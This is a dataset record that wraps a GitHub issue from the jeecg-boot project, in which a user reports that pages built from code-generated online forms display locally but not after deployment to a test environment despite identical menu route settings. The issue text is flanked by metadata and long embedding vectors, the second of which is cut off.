0.006302569527179003, -0.008802070282399654, 0.0008800076902844012, 0.001899541006423533, -0.005377714056521654, 0.0013434318825602531, 0.01969303749501705, -0.013306752778589725, -0.015945779159665108, -0.007741675712168217, -0.008794097229838371, 0.0049990019761025906, -0.020378705114126205, 0.017141712829470634, -0.025864053517580032, -0.024763794615864754, 0.007614109665155411, 0.045764386653900146, -0.029196722432971, 0.01720549538731575, 0.00010202807607129216, 0.010261109098792076, -0.015523215755820274, -0.018927639350295067, -0.0013673505745828152, 0.006410203408449888, -0.009312335401773453, 0.006757024209946394, -0.00031916474108584225, -0.01166433747857809, -0.009288416244089603, 0.02289813943207264, 0.005006974563002586, 0.016296586021780968, -0.007446678820997477, -0.012924054637551308, 0.016097264364361763, 0.014143906533718109, 0.011959334835410118, -0.000962726422585547, 0.0030416573863476515, -0.00827585905790329, 0.005836155265569687, 0.021383289247751236, 0.014765791594982147, 0.0016483949730172753, 0.0029639217536896467, 0.014821602031588554, -0.004692045506089926, -0.011297584511339664, -0.006872630678117275, -0.027203500270843506, -0.0003473190008662641, 0.01961330883204937, 0.005792304407805204, -0.00660952553153038, 0.002860274165868759, 0.006745064631104469, 0.012844325043261051, -0.005680684000253677, -0.024460826069116592, 0.008666531182825565, -0.007303167134523392, 0.005577036179602146, -0.012429734691977501, 0.008849907666444778, -0.0012357978848740458, -0.0001583366101840511, 0.01197528000921011, -0.0019095070892944932, 0.00836356170475483, 0.01201514434069395, 0.010516241192817688, 0.017524411901831627, 0.024715958163142204, 0.015786321833729744, -0.024221638217568398, 0.0011570656206458807, 0.0071995193138718605, -0.011504880152642727, -0.002886186121031642, -0.009567467495799065, -0.01567470096051693, 0.02372732013463974, -0.01028502732515335, 0.003209087997674942, 0.0001455052406527102, -0.0069762784987688065, -0.010994615033268929, 0.029978064820170403, -0.0006682277889922261, -0.005002988502383232, 0.01777954399585724, 0.010532187297940254, -0.008379506878554821, -0.016176993027329445, -0.009264498017728329, -0.013258915394544601, 0.0028881793841719627, -0.0007823397754691541, 0.009320308454334736, -0.0036077324766665697, 0.025050818920135498, 0.04595573619008064, -0.004401035141199827, -0.024221638217568398, 0.02009168267250061, 0.006872630678117275, -0.020426543429493904, 0.010468403808772564, 0.007590190973132849, -0.000912895891815424, 0.028702402487397194, 0.012924054637551308, -0.001623479649424553, 0.009998003952205181, 0.01878412812948227, -0.0036077324766665697, 0.00664540333673358, 0.009535576216876507, -0.01079529244452715, -0.0027048029005527496, -0.019326284527778625, 0.006079328246414661, 0.01939006708562374, 0.0022304158192127943, -0.00015422557771671563, 0.007255329750478268, 0.010492322966456413, 0.02985049970448017, -0.0025872027035802603, -0.0111381271854043, -0.02192544750869274, 0.025927837938070297, 0.023360567167401314, -0.0429898202419281, 0.000986645114608109, 0.0094797657802701, 0.004596370737999678, -0.008443290367722511, -0.0002695833391044289, 0.0013633641647174954, -0.005764399189502001, -0.0049990019761025906, 0.0009293399634771049, -0.005939802620559931, 0.016121182590723038, -0.01567470096051693, -0.0019772767554968596, 0.005317917559295893, -0.0021387275774031878, -0.013370536267757416, 0.022834356874227524, -0.0051265680231153965, -0.0006074345437809825, -0.013840936124324799, -0.009567467495799065, 0.004811638966202736, 0.019326284527778625, -0.005345822311937809, -0.0034622272942215204, -0.01913493499159813, -0.001535777817480266, -0.0015537168364971876, -0.005266093648970127, -0.011377313174307346, 0.003992424346506596, -0.005122581496834755, -0.002120788674801588, -0.027602143585681915, 0.006083314772695303, 0.015292002819478512, 0.002922064159065485, 0.01916682720184326, -0.0103089464828372, -0.012916081584990025, -0.0062627047300338745, -0.013697424903512001, 0.03590989485383034, 0.010316919535398483, -0.0012437708210200071, -0.011417178437113762, 0.003209087997674942, -0.0009114009444601834, 0.0010215265210717916, 0.004656167700886726, -0.025337843224406242, 0.01655171811580658, -0.007861269637942314, 0.018720345571637154, 0.00005661997420247644, 0.0006816820823587477, 0.004628262482583523, 0.02570459619164467, -0.014957141131162643, -0.006605539005249739, -0.0022782532032579184, -0.009336253628134727, -0.00022735193488188088, -0.005313931033015251, -0.010229217819869518, -0.006561688147485256, 0.00016880102339200675, 0.0048873815685510635, 0.0033984442707151175, 0.010197325609624386, -0.007829377427697182, 0.012605139054358006, 0.01865656115114689, 0.011289611458778381, -0.019645201042294502, 0.01473390031605959, -0.008802070282399654, 0.000032576728699496016, 0.0008401432423852384, -0.023312728852033615, -0.017651977017521858, -0.02123977802693844, 0.029404018074274063, -0.019326284527778625, -0.010045841336250305, -0.03190750628709793, -0.028383487835526466, 0.02438109740614891, 0.016049426048994064, -0.014646198600530624, 0.017285224050283432, 0.010261109098792076, -0.013314725831151009, 0.013298779726028442, -0.02071356773376465, 0.0004826089716516435, -0.00411401130259037, 0.0009427941986359656, 0.01903926022350788, -0.004680086392909288, 0.007366950158029795, 0.020059790462255478, 0.0008805060060694814, -0.013298779726028442, -0.00910503976047039, 0.00021240276691969484, 0.008419371210038662, 0.006649389863014221, -0.00464022159576416, 0.001485947286710143, -0.029148884117603302, -0.002730714622884989, 0.010643808171153069, 0.0051664323545992374, 0.009312335401773453, 0.005042852833867073, -0.0012019131099805236, -0.0005045344005338848, -0.008283832110464573, 0.004907313734292984, 0.006167029961943626, 0.025624867528676987, -0.01398444827646017, -0.013737289234995842, 0.005022920668125153, -0.010436512529850006, -0.00816423911601305, 0.06046639382839203, 0.005122581496834755, 0.006661349441856146, 0.01317918673157692, -0.019900333136320114, 0.0073111397214233875, 0.004476777743548155, -0.0030017930548638105, 0.0019075138261541724, -0.012581219896674156, -0.011154072359204292, 0.005250148009508848, 0.00827585905790329, -0.015961725264787674, -0.001961330883204937, -0.006446081213653088, -0.0019503681687638164, 0.00560494139790535, -0.009551521390676498, -0.033549919724464417, -0.0012945979833602905, -0.00643412210047245, 0.007347017992287874, -0.021686259657144547, -0.0002628561924211681, -0.0020031884778290987, -0.005234201904386282, -0.01352999359369278, -0.005441497080028057, 0.007016142830252647, 0.03150885924696922, -0.004273469094187021, -0.002790511352941394, -0.015212273225188255, 0.02106437459588051, 0.0016174999764189124, 0.01615307480096817, 0.010085705667734146, 0.003964519593864679, -0.0005700616165995598, 0.0020809241104871035, -0.008064578287303448, -0.02390272356569767, 0.005194337572902441, -0.01282837986946106, 0.018704399466514587, -0.007817418314516544, 0.022563278675079346, 0.029340233653783798, 0.012381897307932377, -0.0049272459000349045, 0.009710979647934437, 0.002369941445067525, 0.016487935557961464, 0.002433724468573928, 0.00503487978130579, 0.018624670803546906, -0.00025326383183710277, -0.029085101559758186, -0.012365952134132385, -0.007044048048555851, 0.0009886383777484298, -0.022387873381376266, -0.015180381946265697, -0.018879802897572517, 0.00005920493640587665, 0.01096272375434637, 0.008315724320709705, 0.002220449736341834, 0.017795490100979805, -0.009152877144515514, -0.015387676656246185, -0.005768385715782642, -0.0018796087242662907, 0.0008670517709106207, -0.022260308265686035, -0.008618693798780441, -0.009336253628134727, 0.009081121534109116, -0.005939802620559931, -0.02092086337506771, -0.01939006708562374, 0.027905113995075226, -0.009854491800069809, 0.013514048419892788, -0.004711977671831846, -0.006230813451111317, -0.0034602340310811996, -0.002057005651295185, -0.007083912380039692, 0.02197328396141529, 0.0016802864847704768, -0.002346022753044963, -0.024508662521839142, 0.003896749811246991, -0.013729316182434559, 0.00589993828907609, 0.012397843413054943, -0.0005132547812536359, -0.00505481194704771, 0.02849510684609413, 0.007036074995994568, -0.014279445633292198, -0.005074744112789631, 0.008016740903258324, -0.00928044319152832, 0.023583807051181793, -0.016471989452838898, -0.024620283395051956, 0.0036057394463568926, 0.005010961089283228, -0.01335459016263485, -0.018465211614966393, -0.004058200865983963, 0.00214470736682415, 0.009647196158766747, 0.012756623327732086, -0.016998201608657837, -0.005417578388005495, 0.01642415300011635, -0.010404621250927448, 0.00274267396889627, 0.002379907527938485, -0.0024117990396916866, 0.0006926447967998683, -0.00969503354281187, 0.0008780144853517413, 0.0068008750677108765, 0.006569661200046539, 0.009216660633683205, -0.0008022719994187355, -0.003713373327627778, 0.010914886370301247, 0.011002588085830212, 0.016583610326051712, 0.014702009037137032, 0.005202310625463724, 0.02079329639673233, 0.013553912751376629, 0.004624275956302881, 0.012206493876874447, 0.03677096590399742, -0.01508470717817545, -0.00532987667247653, -0.01873629167675972, 0.006964318919926882, 0.00995813962072134, -0.002232409082353115, -0.005361768417060375, -0.006226826924830675, 0.008387479931116104, 0.009703006595373154, -0.010827184654772282, -0.000656268501188606, 0.001530794776044786, 0.00735499057918787, 0.02674107253551483, 0.02871834859251976, -0.014223635196685791, 0.008180185221135616, -0.010085705667734146, 0.012230413034558296, 0.002415785565972328, -0.018449267372488976, 0.0012547335354611278, -0.001984252827242017, -0.002541358582675457, -0.006394257303327322, 0.01763603277504444, -0.003219054313376546, -0.01961330883204937, -0.016535773873329163, -0.007155668456107378, -0.010643808171153069, 0.016009561717510223, 0.00853896513581276, 0.01851304993033409, 0.0038688448257744312, 0.01311540324240923, 0.008180185221135616, 0.0062387860380113125, 0.029037265107035637, -0.03996012359857559, 0.00002539801425882615, 0.026757018640637398, -0.019453851506114006, -0.009846518747508526, -0.01398444827646017, 0.014446876011788845, 0.011951361782848835, 0.020426543429493904, -0.012286222539842129, 0.02049032598733902, 0.001190950395539403, -0.008626666851341724, 0.01886385679244995, 0.014040258713066578, 0.004556506406515837, 0.01703009195625782, -0.00003182926957379095, 0.01026908215135336, -0.01703009195625782, -0.009926247410476208, 0.007267288863658905 ]
null
null
null
null
null
null
null
null
null
[ "jeecgboot", "jeecg-boot" ]
##### 版本号:3.6.3 ##### 问题描述: online表单进行代码代码生成后,进行了一些配置的修改,然后重新配置了菜单路由,在本地跑的时候是可以展示页面的,但是发版到测试环境,相同的菜单路由配置情况下,页面内容不展示。 ##### 截图&代码: ![1](https://github.com/jeecgboot/jeecgboot-vue3/assets/125941405/9d1f324a-c030-4f8d-8f3e-998a8e9b5940) ![2](https://github.com/jeecgboot/jeecgboot-vue3/assets/125941405/fec31917-d74d-4dd6-9289-ce59f0d18440) ![3](https://github.com/jeecgboot/jeecgboot-vue3/assets/125941405/3282d47d-7858-4638-b661-d479d48a8ce6) ![4](https://github.com/jeecgboot/jeecgboot-vue3/assets/125941405/84a1b23e-a8fc-49c6-b0c5-08ab7572c1a9) ##### 前端安装环境: > 如果你是启动报错,请说明你的前端环境 - 采用的是pnpm安装还是yarn? pmpm - node版本号:?18.20.1 - pnpm版本号:?9.0.6 #### 友情提示(为了提高issue处理效率): - 未按格式要求发帖,会被直接删掉; - 请自己初判问题描述是否清楚,是否方便我们调查处理; - 描述过于简单或模糊,导致无法处理的,会被直接删掉;
online表单进行代码生成后二次开发,重新配置路由菜单问题
https://api.github.com/repos/jeecgboot/JeecgBoot/issues/6580/comments
3
2024-05-08T03:45:19
2024-06-21T16:14:24Z
https://github.com/jeecgboot/JeecgBoot/issues/6580
2,366,850,548
6,580
false
This is a GitHub Issue repo:jeecg-boot owner:jeecgboot Title : online表单进行代码生成后二次开发,重新配置路由菜单问题 Issue date: --- start body --- ##### 版本号:3.6.3 ##### 问题描述: online表单进行代码代码生成后,进行了一些配置的修改,然后重新配置了菜单路由,在本地跑的时候是可以展示页面的,但是发版到测试环境,相同的菜单路由配置情况下,页面内容不展示。 ##### 截图&代码: ![1](https://github.com/jeecgboot/jeecgboot-vue3/assets/125941405/9d1f324a-c030-4f8d-8f3e-998a8e9b5940) ![2](https://github.com/jeecgboot/jeecgboot-vue3/assets/125941405/fec31917-d74d-4dd6-9289-ce59f0d18440) ![3](https://github.com/jeecgboot/jeecgboot-vue3/assets/125941405/3282d47d-7858-4638-b661-d479d48a8ce6) ![4](https://github.com/jeecgboot/jeecgboot-vue3/assets/125941405/84a1b23e-a8fc-49c6-b0c5-08ab7572c1a9) ##### 前端安装环境: > 如果你是启动报错,请说明你的前端环境 - 采用的是pnpm安装还是yarn? pmpm - node版本号:?18.20.1 - pnpm版本号:?9.0.6 #### 友情提示(为了提高issue处理效率): - 未按格式要求发帖,会被直接删掉; - 请自己初判问题描述是否清楚,是否方便我们调查处理; - 描述过于简单或模糊,导致无法处理的,会被直接删掉; --- end body ---
931
[ 0.013994879089295864, -0.0012995813740417361, -0.007240240462124348, 0.035695698112249374, 0.029199782758951187, -0.0020638068672269583, 0.009218470193445683, 0.051203109323978424, -0.01065935380756855, 0.007395473774522543, -0.018309568986296654, 0.028483320027589798, 0.014408835209906101, 0.016088537871837616, 0.035249900072813034, 0.034262776374816895, -0.03852970153093338, 0.018850894644856453, 0.0072482009418308735, -0.01958327740430832, -0.009990655817091465, -0.016812961548566818, 0.026095116510987282, 0.04247820004820824, -0.002360342303290963, 0.015133257023990154, 0.002832012716680765, 0.0026469267904758453, 0.007264122366905212, -0.012211686931550503, -0.010476257652044296, 0.038243118673563004, 0.0156268198043108, -0.021223178133368492, -0.008549773134291172, 0.0016966203693300486, 0.002207099227234721, 0.03916655480861664, -0.03353039175271988, 0.010078223422169685, 0.011001662351191044, 0.0016926400130614638, 0.0004652023781090975, 0.013851586729288101, 0.006909871939569712, -0.03907102718949318, 0.003391250502318144, -0.02663644216954708, -0.0062531158328056335, 0.0007005400257185102, 0.014663576148450375, 0.0007507918635383248, 0.011439500376582146, -0.01988578401505947, -0.0007254171650856733, -0.03728783503174782, 0.05712585523724556, 0.013628687709569931, -0.033180125057697296, 0.023611383512616158, 0.0014428736176341772, -0.030871525406837463, -0.007216358557343483, 0.01524470653384924, -0.02176450565457344, 0.07947944849729538, -0.035377271473407745, 0.02663644216954708, 0.020984359085559845, 0.04008999466896057, 0.0011712153209373355, 0.008263188414275646, 0.036937564611434937, -0.00833483412861824, 0.01146338228136301, 0.005568497348576784, 0.027862386777997017, -0.021700819954276085, -0.01151114609092474, 0.032161157578229904, -0.011359893716871738, 0.0179752204567194, -0.046108271926641464, -0.03706493601202965, 0.029868479818105698, 0.022465044632554054, -0.021891875192523003, -0.0952734425663948, 0.013381906785070896, -0.002465821336954832, -0.022640179842710495, -0.03259103372693062, -0.014122250489890575, -0.045885372906923294, 0.019599199295043945, 0.009807560592889786, -0.01980617642402649, 0.012617681175470352, -0.031126268208026886, 0.024073103442788124, -0.003916655667126179, 0.021430157124996185, -0.04273294284939766, -0.023563619703054428, 0.04891043156385422, 0.003454935969784856, 0.06123356893658638, -0.005906826350837946, 0.0001974000479094684, 0.04126817733049393, -0.02146199904382229, -0.004430119413882494, -0.03852970153093338, -0.014217778109014034, -0.006336702965199947, 0.02002907730638981, -0.03177904337644577, -0.029757030308246613, 0.008931885473430157, 0.012466427870094776, -0.0021533644758164883, -0.027289219200611115, 0.0448664054274559, -0.07164613902568817, -0.0619659498333931, 0.013031636364758015, -0.018182197585701942, 0.0017185122705996037, -0.007140731904655695, -0.04276478290557861, 0.020506717264652252, -0.011527067981660366, 0.005023190286010504, -0.022449124604463577, 0.05537450686097145, -0.011694242246448994, 0.001972259022295475, -0.003709677839651704, -0.035249900072813034, -0.03833864629268646, -0.016279594972729683, -0.05161706358194351, 0.042573727667331696, -0.004533608444035053, -0.006384467240422964, 0.03719230741262436, 0.0235158558934927, 0.022894922643899918, -0.0056321825832128525, -0.01151114609092474, -0.040917906910181046, 0.011113112792372704, 0.007881075143814087, 0.06941714882850647, 0.05591583251953125, -0.002714592730626464, -0.008533851243555546, 0.018118511885404587, 0.04381559416651726, -0.05693479999899864, 0.016303477808833122, -0.00017700079479254782, 0.010293162427842617, -0.00680638337507844, 0.010396650992333889, -0.02641354314982891, 0.02453482337296009, -0.001370232435874641, -0.03365776315331459, 0.016040774062275887, -0.054196324199438095, 0.01783192902803421, -0.01229129359126091, 0.012983872555196285, -0.04575800150632858, -0.017624950036406517, 0.02235359512269497, 0.010006577707827091, -0.0038529701996594667, 0.0045256479643285275, -0.0017632910748943686, -0.015403919853270054, 0.016733353957533836, -0.005194345023483038, 0.026986712589859962, -0.0409497506916523, 0.018850894644856453, -0.023133741691708565, -0.027321061119437218, -0.018086669966578484, -0.019455907866358757, 0.02337256260216236, 0.030425727367401123, -0.014878515154123306, -0.01635124161839485, -0.003239997662603855, -0.05301814153790474, -0.05336841195821762, 0.009855324402451515, 0.017402051016688347, 0.012227607890963554, -0.016526376828551292, -0.016781117767095566, -0.011542988941073418, -0.00016754747775848955, 0.010468296706676483, 0.015411880798637867, 0.0031464595813304186, -0.049324385821819305, -0.042223457247018814, -0.03821127489209175, 0.017449814826250076, 0.017847849056124687, -0.022783473134040833, -0.047318294644355774, 0.006862108130007982, -0.004219161346554756, 0.003303683130070567, -0.012880383990705013, 0.015889521688222885, 0.03712862357497215, -0.011296208016574383, -0.001892652246169746, 0.017242837697267532, -0.06056487187743187, 0.0015523330075666308, 0.024057181552052498, 0.00711684999987483, 0.00240213586948812, -0.0016936351312324405, 0.009306037798523903, -0.026445386931300163, 0.004107711836695671, -0.013039597310125828, 0.01837325468659401, 0.003996262326836586, -0.01894642412662506, -0.025856295600533485, -0.027910152450203896, 0.01432922761887312, 0.010508100502192974, 0.059386689215898514, -0.03856154531240463, -0.025808531790971756, 0.03445383161306381, 0.013652569614350796, 0.022544652223587036, 0.008231345564126968, 0.014775026589632034, -0.016956252977252007, -0.006054098717868328, 0.004426139406859875, -0.009576700627803802, -0.029932165518403053, 0.041905030608177185, 0.007200437132269144, -0.006647169589996338, -0.00657154293730855, 0.00862937979400158, 0.0036380316596478224, -0.000018782235201797448, 0.0014070505276322365, -0.08100790530443192, 0.0038091863971203566, 0.03368960693478584, -0.019774334505200386, 0.012036551721394062, 0.03302090987563133, 0.0046132151037454605, 0.015125296078622341, 0.039262086153030396, -0.024391530081629753, -0.026397621259093285, 0.03712862357497215, -0.024646272882819176, -0.0047405860386788845, 0.039803411811590195, 0.009672229178249836, 0.03531358763575554, -0.014846672303974628, 0.032957226037979126, 0.034485675394535065, -0.0034648869186639786, -0.03821127489209175, -0.0008343789959326386, 0.00974387489259243, 0.010738960467278957, -0.040249209851026535, 0.00001736734702717513, 0.027735017240047455, -0.012577878311276436, -0.03684203699231148, -0.05282708629965782, -0.004919701721519232, -0.006750658620148897, 0.05859062075614929, -0.011136994697153568, 0.03195417672395706, 0.019567357376217842, -0.006332722492516041, -0.008326873183250427, -0.012546035461127758, -0.01084244903177023, -0.0023265094496309757, -0.043019525706768036, 0.01894642412662506, 0.03760626167058945, -0.014440677128732204, -0.028324106708168983, -0.027957916259765625, 0.03203378617763519, -0.01597708836197853, -0.0128724230453372, -0.024869171902537346, -0.015045689418911934, 0.010937977582216263, 0.012776894494891167, 0.01347743533551693, -0.048655688762664795, -0.029358996078372, -0.038911815732717514, 0.016287555918097496, -0.05890904739499092, -0.0089876102283597, 0.03152430057525635, 0.04448429122567177, -0.012410703115165234, 0.003510660957545042, -0.004342552274465561, 0.018214041367173195, 0.022910842671990395, -0.03201786428689957, 0.015865638852119446, 0.0038828228134661913, -0.009313997812569141, -0.023308876901865005, 0.0026230448856949806, -0.027066320180892944, 0.003642012132331729, -0.01988578401505947, -0.009051295928657055, 0.014631734229624271, 0.029311232268810272, -0.0028419634327292442, 0.02235359512269497, -0.04088606312870979, -0.011813652701675892, 0.009170705452561378, 0.05085283890366554, -0.015499448403716087, 0.0009717007633298635, 0.009266234003007412, 0.005333656910806894, 0.01725875958800316, 0.00991901010274887, -0.022146617993712425, -0.011272326111793518, 0.0038927735295146704, 0.0179752204567194, 0.01760902814567089, 0.030696390196681023, -0.04161844775080681, -0.0034370245411992073, 0.06212516501545906, 0.04413402080535889, -0.0010134943295270205, -0.0024459196720272303, -0.029374917969107628, -0.03128547966480255, -0.027209611609578133, -0.01463969424366951, 0.002316558500751853, -0.049865711480379105, 0.02485325001180172, -0.016590062528848648, 0.01703586056828499, -0.025728924199938774, -0.01124048326164484, -0.025633396580815315, 0.02646130695939064, -0.00038086887798272073, -0.0039902920834720135, -0.013660530559718609, -0.0015115345595404506, -0.00412363326177001, 0.025283126160502434, 0.03163575008511543, -0.006595425307750702, -0.004979406483471394, -0.03585491329431534, -0.009290115907788277, 0.026254329830408096, -0.020395267754793167, -0.02517167665064335, -0.019997233524918556, -0.002475772053003311, -0.016781117767095566, -0.007423336151987314, 0.003281791228801012, -0.06489548087120056, 0.01654229685664177, 0.03204970806837082, 0.03782916069030762, -0.0020498756784945726, 0.02994808554649353, -0.026429465040564537, 0.02149384282529354, -0.031890492886304855, 0.004549529869109392, 0.029884401708841324, 0.02681157737970352, -0.030823761597275734, 0.003936557564884424, 0.04343348369002342, 0.03923024237155914, 0.04824173450469971, -0.01891458034515381, 0.029597816988825798, -0.012155961245298386, -0.012140040285885334, -0.01592136360704899, 0.0005204295739531517, -0.020538559183478355, 0.013994879089295864, -0.009926971048116684, 0.008287070319056511, -0.0006741702673025429, 0.022910842671990395, 0.03056901879608631, 0.006113803945481777, -0.025060227140784264, -0.027735017240047455, 0.01671743206679821, 0.007276063319295645, 0.006754638627171516, 0.008494047448039055, 0.020936593413352966, -0.018214041367173195, -0.0011871367460116744, 0.01886681653559208, 0.001669753110036254, 0.020490795373916626, 0.01644676923751831, -0.010452375747263432, -0.01872352510690689, 0.005055033136159182, -0.06833449751138687, 0.010317044332623482, -0.0036758449859917164, 0.021557526662945747, -0.019631043076515198, 0.024057181552052498, -0.038466017693281174, -0.032161157578229904, -0.02074553817510605, -0.03128547966480255, -0.02198740467429161, 0.005289873108267784, 0.03477225825190544, -0.017624950036406517, 0.005656064487993717, 0.02431192249059677, -0.008549773134291172, 0.004911740776151419, -0.0035723561886698008, -0.000853783159982413, 0.019599199295043945, 0.0038091863971203566, 0.014496401883661747, -0.02713000401854515, 0.03190641477704048, -0.008764711208641529, 0.05206286162137985, 0.021032122895121574, -0.02329295687377453, 0.005982452537864447, -0.01904195174574852, -0.03811574727296829, -0.003932577092200518, 0.03012322075664997, -0.05903641879558563, 0.009290115907788277, 0.04085421934723854, 0.027973836287856102, -0.018309568986296654, -0.0296296589076519, 0.043688222765922546, -0.014599891379475594, -0.0015045689651742578, 0.026111038401722908, 0.002931521274149418, -0.00743129663169384, -0.04231898486614227, 0.006830265279859304, 0.005433165468275547, -0.03163575008511543, 0.0012169892434030771, -0.03454935923218727, 0.03142877295613289, 0.017624950036406517, 0.021063964813947678, -0.0037932649720460176, -0.017449814826250076, 0.042573727667331696, 0.016812961548566818, -0.0077815670520067215, -0.00907517783343792, 0.06499101221561432, -0.00244790967553854, 0.006738717667758465, -0.01436903141438961, -0.013628687709569931, -0.018787210807204247, -0.03308459371328354, -0.007307906169444323, -0.0014707359950989485, -0.014934239909052849, 0.00047614829964004457, 0.05801745131611824, 0.012179844081401825, -0.025092070922255516, -0.022226225584745407, -0.011431539431214333, -0.007415375672280788, 0.016255712136626244, 0.00027140951715409756, 0.02015644684433937, 0.0040679085068404675, 0.010396650992333889, -0.04903780296444893, -0.032606955617666245, 0.018516546115279198, 0.05110757797956467, 0.05734875425696373, -0.03556832671165466, -0.006495916750282049, -0.016574140638113022, 0.004712723661214113, -0.010086184367537498, -0.025092070922255516, 0.00647999532520771, 0.018452860414981842, -0.008016406558454037, -0.014217778109014034, -0.02329295687377453, 0.006563582457602024, -0.013111243955790997, -0.00462515652179718, -0.0031146169640123844, -0.0071447123773396015, 0.014599891379475594, -0.02324519120156765, 0.032208919525146484, 0.013214732520282269, -0.02042710967361927, -0.021127650514245033, -0.009799599647521973, 0.005158522166311741, 0.006655130535364151, -0.007355670444667339, -0.0001599599636392668, -0.01018967293202877, 0.022051090374588966, -0.01953551359474659, -0.0021533644758164883, -0.012402743101119995, -0.023484012112021446, -0.0014926278963685036, -0.024789564311504364, -0.020347503945231438, -0.007662156596779823, 0.009043334983289242, -0.006977538112550974, -0.00680638337507844, 0.01568254455924034, -0.014942200854420662, 0.023945732042193413, 0.005600339733064175, -0.015276549383997917, -0.0096961110830307, 0.039707884192466736, 0.00004325511326896958, -0.016184067353606224, 0.013421710580587387, -0.03111034631729126, 0.002941471990197897, 0.03410356119275093, -0.000901547260582447, 0.0011393725872039795, 0.007128790952265263, -0.010723038576543331, -0.002041914965957403, -0.015451684594154358, 0.0013493356527760625, 0.027416588738560677, -0.00766613706946373, -0.018214041367173195, 0.0274006687104702, 0.003837048774585128, -0.0022449123207479715, -0.0021553547121584415, 0.013525199145078659, 0.02525128424167633, -0.05435553938150406, 0.0015334264608100057, 0.03954866901040077, 0.03782916069030762, 0.010937977582216263, 0.010197633877396584, 0.0007020326447673142, -0.004262945149093866, 0.020188290625810623, 0.021079886704683304, -0.029040569439530373, -0.01725875958800316, -0.03830680251121521, 0.039134714752435684, 0.0036937566474080086, -0.001771251787431538, 0.015587016008794308, 0.019121559336781502, -0.04219161719083786, 0.034708574414253235, 0.0002701656485442072, -0.006790461950004101, 0.021557526662945747, -0.0240890234708786, -0.013254535384476185, -0.011542988941073418, 0.0024578606244176626, -0.07158245146274567, -0.009481172077357769, -0.034581203013658524, -0.04110896214842796, 0.01775232143700123, 0.018452860414981842, 0.03212931379675865, 0.003301692893728614, -0.020538559183478355, -0.021430157124996185, -0.032559189945459366, 0.010945937596261501, -0.01725875958800316, 0.013294339179992676, -0.024375608190894127, -0.004402257036417723, -0.022894922643899918, 0.011574831791222095, 0.016972174867987633, 0.0016269644256681204, -0.012163922190666199, -0.000911498093046248, -0.0021016201935708523, 0.01971064880490303, 0.022273989394307137, -0.021605292335152626, -0.03298906609416008, 0.004597294144332409, -0.02342032641172409, -0.030680468305945396, -0.03044164925813675, -0.03413540497422218, 0.020044997334480286, -0.005345597863197327, 0.028817670419812202, 0.034835945814847946, 0.013071440160274506, 0.00819950271397829, 0.0018409077310934663, 0.00787709467113018, 0.01211615838110447, -0.03445383161306381, -0.010340926237404346, -0.006961616687476635, -0.017816007137298584, -0.029295310378074646, 0.0038887932896614075, -0.036141496151685715, -0.005691887810826302, -0.022608337923884392, -0.02047487534582615, 0.007355670444667339, 0.01455212663859129, 0.009903088212013245, -0.014177975244820118, 0.018532468006014824, -0.05091652274131775, -0.013620726764202118, 0.02507614903151989, 0.0036818154621869326, -0.017720477655529976, 0.025060227140784264, 0.016653746366500854, 0.013294339179992676, 0.0031245676800608635, -0.013214732520282269, 0.010062302462756634, 0.00042141860467381775, 0.011304168961942196, -0.0010174746857956052, -0.03521805629134178, -0.0327024832367897, -0.029358996078372, -0.0005492870695888996, 0.01517305988818407, 0.02386612445116043, -0.0035723561886698008, 0.032559189945459366, 0.011941023170948029, 0.011622595600783825, -0.003319604555144906, -0.01778416335582733, 0.014743183739483356, 0.02579260990023613, -0.030377963557839394, -0.00258722179569304, -0.03865707293152809, -0.014934239909052849, -0.06667867302894592, -0.004919701721519232, -0.02579260990023613, -0.004207220394164324, -0.009361762553453445, -0.012880383990705013, -0.013955076225101948, -0.03566385805606842, 0.04442060738801956, -0.015515369363129139, 0.009871246293187141, 0.002867835806682706, -0.014337188564240932, 0.029693344607949257, 0.007857193239033222, 0.020013155415654182, -0.007634294219315052, 0.022465044632554054, 0.021286863833665848, -0.024789564311504364, -0.022273989394307137, 0.01295999065041542, -0.0014010800514370203, 0.009417487308382988, -0.014974042773246765, -0.007411395199596882, -0.019790256395936012, 0.007168594282120466, -0.02517167665064335, -0.0006866088369861245, 0.011606674641370773, -0.009218470193445683, 0.03311643749475479, 0.018962344154715538, 0.0009458285639993846, -0.005074935033917427, -0.016526376828551292, -0.0029394819866865873, 0.022242145612835884, -0.002028978895395994, -0.014249620959162712, -0.011622595600783825, 0.0017692616675049067, 0.016056695953011513, 0.00943340826779604, 0.015093453228473663, 0.018309568986296654, 0.0030131181702017784, 0.022894922643899918, -0.01041257195174694, 0.0017483647679910064, 0.01810259185731411, 0.0037196287885308266, 0.02856292761862278, -0.004756507463753223, 0.010858370922505856, -0.008884121663868427, -0.027018554508686066, -0.0038728718645870686, -0.016637826338410378, -0.02752803824841976, -0.0033116438426077366, -0.029358996078372, -0.0089876102283597, 0.019248928874731064, 0.018962344154715538, 0.01414613239467144, -0.01184549555182457, -0.001963303191587329, -0.009409526363015175, 0.016430847346782684, 0.008255227468907833, -0.02047487534582615, 0.008844317868351936, 0.0030031674541532993, -0.013994879089295864, 0.031030738726258278, -0.029470445588231087, -0.017354287207126617, -0.007678078021854162, 0.008884121663868427, -0.02690710499882698, 0.02127094194293022, 0.01971064880490303, -0.021111728623509407, 0.043337952345609665, -0.02606327272951603, -0.009377683512866497, 0.0053256964311003685, 0.000930404756218195, -0.04849647730588913, 0.03407172113656998, 0.01010210532695055, 0.0009488138020969927, -0.04215977340936661, 0.013501317240297794, 0.00208370853215456, -0.02829226478934288, 0.003192233620211482, 0.005242109298706055, 0.007729822304099798, 0.004879898391664028, 0.023993495851755142, -0.010555864311754704, 0.04021736606955528, -0.045216675847768784, 0.01570642553269863, -0.02453482337296009, -0.005552575923502445, 0.014838711358606815, 0.02221030369400978, -0.017688635736703873, -0.0064322310499846935, -0.016781117767095566, -0.025219440460205078, 0.01694033108651638, -0.016812961548566818, 0.013358024880290031, -0.003170341718941927, 0.02695487067103386, 0.007920878939330578, 0.0011523087741807103, -0.022417280822992325, -0.00762235326692462, -0.017895612865686417, 0.01472726184874773, -0.021350549533963203, -0.004187318962067366, -0.0021394332870841026, -0.032957226037979126, 0.05623425915837288, 0.01698809489607811, 0.02396165393292904, 0.04575800150632858, -0.014353110454976559, 0.02685934118926525, -0.011001662351191044, 0.004354493226855993, -0.007721861824393272, 0.03961235284805298, -0.005890904925763607, -0.008995571173727512, 0.003556434763595462, 0.008565694093704224, -0.0064561134204268456, -0.01211615838110447, 0.0006189430132508278, -0.018245883285999298, -0.006655130535364151, -0.04241451621055603, 0.004959505051374435, 0.025139834731817245, -0.031794965267181396, -0.00403606565669179, -0.020506717264652252, 0.01703586056828499, -0.021127650514245033, -0.017577186226844788, 0.024423373863101006, 0.005970511585474014, 